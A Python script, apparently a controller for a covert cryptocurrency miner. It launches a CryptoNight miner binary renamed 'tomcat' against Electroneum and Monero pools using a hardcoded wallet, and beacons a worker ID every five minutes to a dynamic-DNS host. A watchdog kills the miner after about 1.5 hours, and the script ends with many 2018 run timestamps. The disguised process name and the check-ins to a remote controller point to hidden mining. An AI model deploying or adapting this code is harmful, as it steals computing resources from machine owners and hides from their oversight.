import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:02:04.973242
#2018-02-17 16:50:06.084262
#2018-02-17 18:38:04.397449
#2018-02-17 20:26:07.385053
#2018-02-17 22:13:05.200023
#2018-02-17 23:57:07.104182
#2018-02-18 01:48:06.642479
#2018-02-18 03:37:04.279542
#2018-02-18 05:24:05.263452
#2018-02-18 07:16:05.289111
#2018-02-18 09:03:07.173470
#2018-02-18 10:50:08.858657
#2018-02-18 12:38:06.948746
#2018-02-18 14:24:06.900048
#2018-02-18 16:15:01.578976
#2018-02-18 18:03:04.123352
#2018-02-18 19:50:02.104104
#2018-02-18 21:36:07.126146
#2018-02-18 23:24:04.771506
#2018-02-19 01:10:03.053279
#2018-02-19 02:56:06.828708
#2018-02-19 04:43:02.004919
#2018-02-19 06:27:04.123959
#2018-02-19 08:17:01.635579
#2018-02-19 10:06:01.481779
#2018-02-19 11:55:11.553149
#2018-02-19 13:42:05.747827
#2018-02-19 15:29:09.509139
#2018-02-19 17:18:09.514802
#2018-02-19 19:07:06.098590
#2018-02-19 20:53:05.336320
#2018-02-19 22:41:07.763078
#2018-02-20 00:25:05.656410
#2018-02-20 02:12:06.506458
#2018-02-20 04:04:06.374466
#2018-02-20 05:48:07.672547
#2018-02-20 07:34:07.373880
#2018-02-20 09:19:01.863562
#2018-02-20 11:03:04.662979
#2018-02-20 12:49:10.548638
#2018-02-20 14:34:05.502714
#2018-02-20 16:19:09.082572
#2018-02-20 18:06:05.328285
#2018-02-20 19:56:07.222720
#2018-02-20 21:43:09.529020
#2018-02-21 00:25:07.864398
#2018-02-21 02:11:06.703688
#2018-02-21 03:57:03.694225
#2018-02-21 05:44:06.474389
#2018-02-21 07:32:07.347262
#2018-02-21 09:16:08.384799
#2018-02-21 11:06:04.811441
#2018-02-21 12:54:04.289043
#2018-02-21 14:43:01.871718
#2018-02-21 16:29:08.749624
#2018-02-21 18:20:08.671125
#2018-02-21 20:05:05.773132
#2018-02-21 21:52:07.657757
#2018-02-21 23:40:07.879298
#2018-02-22 01:30:04.797926
#2018-02-22 03:18:01.360030
#2018-02-22 05:05:04.614225
#2018-02-22 06:48:01.846966
#2018-02-22 08:36:06.527861
#2018-02-22 10:23:07.138638
#2018-02-22 12:08:11.300849
#2018-02-22 13:53:10.194919
#2018-02-22 15:40:01.819686
#2018-02-22 17:26:02.090735
#2018-02-22 19:15:07.130254
#2018-02-22 21:06:01.543538
#2018-02-22 22:50:10.822208
#2018-02-23 00:39:01.352828
#2018-02-23 02:25:08.734772
#2018-02-23 04:15:07.249375
#2018-02-23 06:02:06.112229
#2018-02-23 07:49:03.942350
#2018-02-23 09:48:07.229237
#2018-02-23 11:53:10.426025
#2018-02-23 13:42:07.911518
#2018-02-23 15:31:05.610324
#2018-02-23 17:21:06.627639
#2018-02-23 19:07:06.801374
#2018-02-23 20:52:06.471898
#2018-02-23 22:41:07.325479
#2018-02-24 00:27:02.124447
#2018-02-24 02:17:07.573225
#2018-02-24 04:06:08.141951
#2018-02-24 05:53:07.013499
#2018-02-24 07:43:03.708156
#2018-02-24 09:28:04.309461
#2018-02-24 11:21:04.911067
#2018-02-24 13:10:09.001336
#2018-02-24 15:00:06.982856
#2018-02-24 16:50:05.875529
#2018-02-24 18:38:01.502771
#2018-02-24 20:29:03.578503
#2018-02-24 22:26:03.418638
#2018-02-25 01:35:04.483839
#2018-02-25 05:30:01.922215
#2018-02-25 11:35:04.752246